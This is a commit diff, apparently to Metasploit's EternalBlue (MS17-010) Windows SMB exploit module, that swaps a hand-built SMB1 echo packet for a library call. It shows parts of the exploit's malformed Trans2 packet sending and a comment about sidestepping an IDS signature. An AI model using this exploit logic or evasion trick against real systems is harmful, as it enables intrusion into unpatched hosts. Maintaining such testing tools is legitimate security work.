use RubySMB client echo

replaced the manually created echo packet
with the RubySMB client echo command

Author: David Maloney

modules/exploits/windows/smb/ms17_010_eternalblue.rb

@@ -334,12 +334,12 @@ def smb1_large_buffer(client, tree, sock)
         trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)
     end
 
-    trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)
-
     vprint_status("Sending malformed Trans2 packets")
     sock.put(trans2_pkt_nulled)
 
     sock.get_once
+
+    client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
   end
 
   def smb1_free_hole(start)
@@ -434,36 +434,6 @@ def make_smb2_payload_body_packet(kernel_user_payload)
     pkt
   end
 
-  def make_smb1_echo_packet(tree_id, user_id)
-    pkt = ""
-    pkt << "\x00"               # type
-    pkt << "\x00\x00\x31"       # len = 49
-    pkt << "\xffSMB"            # SMB1
-    pkt << "\x2b"               # Echo
-    pkt << "\x00\x00\x00\x00"   # Success
-    pkt << "\x18"               # flags
-    pkt << "\x07\xc0"           # flags2
-    pkt << "\x00\x00"           # PID High
-    pkt << "\x00\x00\x00\x00"   # Signature1
-    pkt << "\x00\x00\x00\x00"   # Signature2
-    pkt << "\x00\x00"           # Reserved
-    pkt << [tree_id].pack("S>") # Tree ID
-    pkt << "\xff\xfe"           # PID
-    pkt << [user_id].pack("S>") # UserID
-    pkt << "\x40\x00"           # MultiplexIDs
-
-    pkt << "\x01"               # Word count
-    pkt << "\x01\x00"           # Echo count
-    pkt << "\x0c\x00"           # Byte count
-
-    # echo data
-    # this is an existing IDS signature, and can be nulled out
-    #pkt << "\x4a\x6c\x4a\x6d\x49\x68\x43\x6c\x42\x73\x72\x00"
-    pkt <<  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00"
-
-    pkt
-  end
-
   # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit
   def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)
     timeout = (timeout * 0x10) + 3